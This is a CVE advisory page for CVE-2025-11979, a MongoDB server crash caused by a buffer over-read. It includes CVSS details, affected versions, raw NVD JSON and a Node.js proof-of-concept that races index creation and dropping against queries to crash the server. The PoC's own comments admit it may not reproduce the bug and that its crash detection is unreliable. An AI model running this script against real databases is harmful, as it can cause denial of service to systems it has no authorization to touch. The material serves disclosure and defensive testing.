Security Vulnerability Report
CVE-2025-11979 CVSS 5.3 MEDIUM

CVE-2025-11979

Published: 2025-10-20 18:15:38
Last Modified: 2025-12-04 21:23:41

Description

An authorized user may crash the MongoDB server by causing buffer over-read. This can be done by issuing a DDL operation while queries are being issued, under some conditions. This issue affects MongoDB Server v7.0 versions prior to 7.0.25, MongoDB Server v8.0 versions prior to 8.0.15, and MongoDB Server version 8.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
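CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H (the Secondary assessment in the raw record below; that record also carries a Primary assessment of 6.5 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H, which rates attack complexity as low)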

Configurations (Affected Products)

cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* (versions 7.0.0 up to, but excluding, 7.0.25) - VULNERABLE
cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:* (versions 8.0.0 up to, but excluding, 8.0.15) - VULNERABLE
MongoDB Server v7.0 < 7.0.25
MongoDB Server v8.0 < 8.0.15
MongoDB Server v8.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-11979 PoC - MongoDB Buffer Over-Read DoS
// This PoC attempts to trigger the buffer over-read crash by issuing
// DDL operations concurrently with queries on the same collection.
// Requires: the Node.js `mongodb` driver (the script is JavaScript, not
// pymongo) and valid MongoDB credentials with readWrite privileges.
//
// NOTE(review): the advisory only says the crash happens "under some
// conditions" and does not name them. The createIndex/dropIndex-vs-find race
// below is a guess at those conditions; nothing on this page shows that it
// reproduces the crash. A run that finishes without a crash is therefore not
// evidence that a server is patched. Decide exposure from the server version
// instead: affected are 7.0 before 7.0.25, 8.0 before 8.0.15, and 8.2.0.
//
// Side effects on the server it is pointed at: three documents are inserted
// and never removed, and up to 50 indexes named temp_idx_<i> are created and
// dropped. Where command logging or auditing is enabled, that burst of paired
// createIndex/dropIndex calls from one authenticated account is presumably
// what this script would leave behind -- confirm against your own log format.
const { MongoClient } = require('mongodb');

// Configuration (placeholder values)
const MONGO_URI = 'mongodb://username:password@target-host:27017';
const DB_NAME = 'test_db';
const COLLECTION_NAME = 'target_collection';

/**
 * Opens two connections to the same deployment, seeds a collection, then runs
 * a query loop and an index create/drop loop concurrently and reports driver
 * errors that it interprets as a server crash.
 *
 * @returns {Promise<void>} Resolves after both loops end and both clients are
 *   closed; errors are logged rather than rethrown.
 */
async function exploit() {
  // Connection 1: Will perform concurrent queries
  const client1 = new MongoClient(MONGO_URI);
  // Connection 2: Will issue DDL operations (createIndex / dropIndex)
  const client2 = new MongoClient(MONGO_URI);

  try {
    await client1.connect();
    await client2.connect();

    const db1 = client1.db(DB_NAME);
    const db2 = client2.db(DB_NAME);
    const coll1 = db1.collection(COLLECTION_NAME);
    const coll2 = db2.collection(COLLECTION_NAME);

    // Insert some sample data to ensure collection exists.
    // These documents are not cleaned up afterwards.
    await coll1.insertMany([
      { name: 'doc1', value: 1 },
      { name: 'doc2', value: 2 },
      { name: 'doc3', value: 3 }
    ]);

    console.log('[*] Starting concurrent DDL and query operations...');

    // Launch concurrent operations. These are two async tasks interleaved on
    // one event loop over separate connections, not OS threads.

    // Task 1: Continuous queries (find with a sort on `value`; no projection
    // is actually applied).
    const queryPromise = (async () => {
      for (let i = 0; i < 1000; i++) {
        try {
          await coll1.find({}).sort({ value: 1 }).toArray();
        } catch (e) {
          // Errors are logged and the loop keeps going. If the server really
          // went away, each remaining iteration may block for the driver's
          // server-selection timeout before failing -- TODO confirm.
          console.log(`[Query] Error: ${e.message}`);
        }
      }
    })();

    // Task 2: Rapid DDL operations (create/drop indexes)
    const ddlPromise = (async () => {
      for (let i = 0; i < 50; i++) {
        try {
          const indexName = `temp_idx_${i}`;
          await coll2.createIndex({ value: 1 }, { name: indexName });
          // 10 ms pause between creating and dropping the index.
          await new Promise(r => setTimeout(r, 10));
          await coll2.dropIndex(indexName);
        } catch (e) {
          console.log(`[DDL] Error: ${e.message}`);
          // Heuristic only: any driver error whose text contains "crash" or
          // "connection" (a network drop, for instance) prints the message
          // below. Confirm a real crash from the mongod process state and
          // server log, not from this output.
          if (e.message.includes('crash') || e.message.includes('connection')) {
            console.log('[+] Server may have crashed!');
            break;
          }
        }
      }
    })();

    // Both tasks catch their own errors, so this never rejects.
    await Promise.all([queryPromise, ddlPromise]);
    console.log('[*] Exploit attempt completed.');
  } catch (error) {
    // Because the two loops swallow their own errors, this handler is reached
    // only by failures in connect() or insertMany(), before the concurrent
    // phase starts. The "SUCCESS" line therefore signals an unreachable or
    // dropped connection during setup, not a crash caused by the race.
    console.error(`[!] Exploit error: ${error.message}`);
    if (error.message.includes('topology was destroyed') || error.message.includes('connection closed')) {
      console.log('[+] SUCCESS: MongoDB server appears to have crashed!');
    }
  } finally {
    // Best-effort cleanup: close errors are deliberately ignored.
    await client1.close().catch(() => {});
    await client2.close().catch(() => {});
  }
}

exploit().catch(console.error);

References

https://jira.mongodb.org/browse/SERVER-105873 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11979", "sourceIdentifier": "[email protected]", "published": "2025-10-20T18:15:38.100", "lastModified": "2025-12-04T21:23:40.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authorized user may crash the MongoDB server by causing buffer over-read. This can be done by issuing a DDL operation while queries are being issued, under some conditions. This issue affects MongoDB Server v7.0 versions prior to 7.0.25, MongoDB Server v8.0 versions prior to 8.0.15, and MongoDB Server version 8.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.25", "matchCriteriaId": "D5DF49A4-6F39-48D2-9CFE-7AB31784A500"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:mongodb:mongodb:*:*:*:*:-:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.15", "matchCriteriaId": "65230BA3-F8DF-4CCA-BBD1-D8CAFA3B554B"}]}]}], "references": [{"url": "https://jira.mongodb.org/browse/SERVER-105873", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}